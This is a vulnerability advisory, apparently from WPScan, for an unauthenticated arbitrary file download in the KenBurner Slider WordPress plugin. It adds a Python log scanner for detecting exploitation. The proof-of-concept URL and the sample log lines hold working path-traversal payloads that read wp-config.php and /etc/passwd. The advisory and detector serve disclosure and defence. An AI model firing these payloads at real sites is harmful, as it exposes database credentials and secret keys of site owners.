KenBurner Slider - Unauthenticated Arbitrary File Download

Description
The WordPress plugin KenBurner Slider suffers from an unauthenticated arbitrary file download vulnerability. The kbslider_show_image AJAX action, reachable through wp-admin/admin-ajax.php without a logged-in session, serves the file named by the img parameter without neutralising path traversal sequences, so an attacker can read any file the web server process can read, including wp-config.php (database credentials and authentication keys/salts).

This issue has been spotted being exploited in the wild.
Proof of Concept
http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
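Because this issue is being exploited in the wild and has no fix, the first thing a practitioner wants is to know whether their own server has already been hit. The following is an added example (not part of the WPScan entry or of the plugin) that scans combined-format access log lines for requests to the kbslider_show_image action whose img value escapes the directory it is joined to. The log lines are constructed for the example; the regex assumes the standard Apache/nginx combined log prefix, and the script decodes repeatedly so that double-encoded traversal such as `..%252f` is caught.

```python
"""Detect exploitation attempts against the KenBurner Slider arbitrary file
download (admin-ajax.php?action=kbslider_show_image&img=...) in web server
access logs.  Added example; not code from the WPScan entry or the plugin."""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx combined-log prefix: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

VULN_ACTION = "kbslider_show_image"

# Constructed sample log lines (RFC 5737 test addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.10 - - [21/Feb/2020:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=kbslider_show_image&img=slide1.jpg HTTP/1.1" 200 48213',
    '203.0.113.55 - - [21/Feb/2020:10:04:17 +0000] "GET /wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php HTTP/1.1" 200 3188',
    '198.51.100.7 - - [21/Feb/2020:10:05:40 +0000] "GET /wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 404 0',
    '198.51.100.7 - - [21/Feb/2020:10:05:41 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 25',
]


def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded traversal (%252e%252e%252f) is seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def escapes_base(img):
    """True if the img value would resolve outside the directory it is joined to."""
    cleaned = decode_fully(img).replace("\\", "/")
    if cleaned.startswith("/"):          # absolute path, e.g. /etc/passwd
        return True
    norm = posixpath.normpath(cleaned)   # collapses a/../b, keeps leading ..
    return norm == ".." or norm.startswith("../")


def classify_target(target):
    """Return None for unrelated requests, else the decoded img values and
    whether any of them is a traversal or absolute path."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)  # decodes one layer
    if VULN_ACTION not in qs.get("action", []):
        return None
    imgs = [decode_fully(v) for v in qs.get("img", [])]
    return {"img": imgs, "traversal": any(escapes_base(v) for v in imgs)}


def scan_log(lines):
    """Return one finding per request that looks like an exploitation attempt."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        result = classify_target(m.group("target"))
        if result and result["traversal"]:
            # A 200 with a non-empty body means the file was most likely served.
            served = m.group("status") == "200" and m.group("size") not in ("0", "-")
            findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "img": result["img"], "served": served})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```

Run it against a real access log with `scan_log(open("access.log"))`; a finding with `served` set to True means the response carried a body and the named file should be treated as disclosed (rotate database credentials and the keys/salts in wp-config.php).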

Affects Plugin

no known fix; until one is available, remove the plugin or block requests to admin-ajax.php with action=kbslider_show_image at the web server or WAF

References

PacketStorm 127987
URL https://twitter.com/Random_Robbie/status/1230173738827702272

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Verified No
WPVDB ID 10079

Timeline

Publicly Published 2014-08-24 (almost 6 years ago)
Added 2020-02-20 (5 months ago)
Last Updated 2020-02-21 (5 months ago)
